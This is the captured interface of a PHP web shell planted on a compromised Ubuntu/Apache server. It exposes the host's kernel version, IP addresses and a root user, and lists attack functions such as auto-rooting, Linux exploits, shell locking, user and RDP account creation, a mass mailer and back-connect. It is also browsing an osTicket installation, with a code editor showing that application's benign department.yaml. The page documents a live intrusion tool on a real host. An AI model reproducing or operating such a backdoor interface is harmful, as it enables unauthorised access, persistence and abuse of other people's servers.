Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
i18n /
en_US /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
config.yaml
2.32
KB
-rw-r--r--
department.yaml
894
B
-rw-r--r--
email_template_group.yaml
621
B
-rw-r--r--
event.yaml
755
B
-rw-r--r--
file.yaml
13.57
KB
-rw-r--r--
filter.yaml
1.23
KB
-rw-r--r--
form.yaml
5.39
KB
-rw-r--r--
group.yaml
998
B
-rw-r--r--
help_topic.yaml
1.5
KB
-rw-r--r--
list.yaml
1.64
KB
-rw-r--r--
organization.yaml
637
B
-rw-r--r--
priority.yaml
477
B
-rw-r--r--
queue.yaml
11.15
KB
-rw-r--r--
queue_column.yaml
3.08
KB
-rw-r--r--
queue_sort.yaml
611
B
-rw-r--r--
role.yaml
1.42
KB
-rw-r--r--
schedule.yaml
3.71
KB
-rw-r--r--
sequence.yaml
779
B
-rw-r--r--
sla.yaml
912
B
-rw-r--r--
team.yaml
405
B
-rw-r--r--
ticket_status.yaml
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : department.yaml
# # Departments defined initially for the system # # Fields: # id - (int:optional) id number in the database # flags - (bitmask: 0x0004 Active 0x0008 Archived) # name - (string) Short name of the department # signature - (string) Descriptive name of the department # # NOTE: The department listed first by ID# will be the default department # # NOTE: ------------------------------------ # The very first group listed in this document will be the primary # department of the initial staff member -- the administrator. --- - id: 1 name: Support signature: | Support Department ispublic: 1 flags: 0x0004 group_membership: 1 - id: 2 name: Sales signature: | Sales and Customer Retention ispublic: 1 flags: 0x0004 sla_id: 1 group_membership: 1 - id: 3 name: Maintenance signature: | Maintenance Department ispublic: 0 flags: 0x0004 group_membership: 0
Close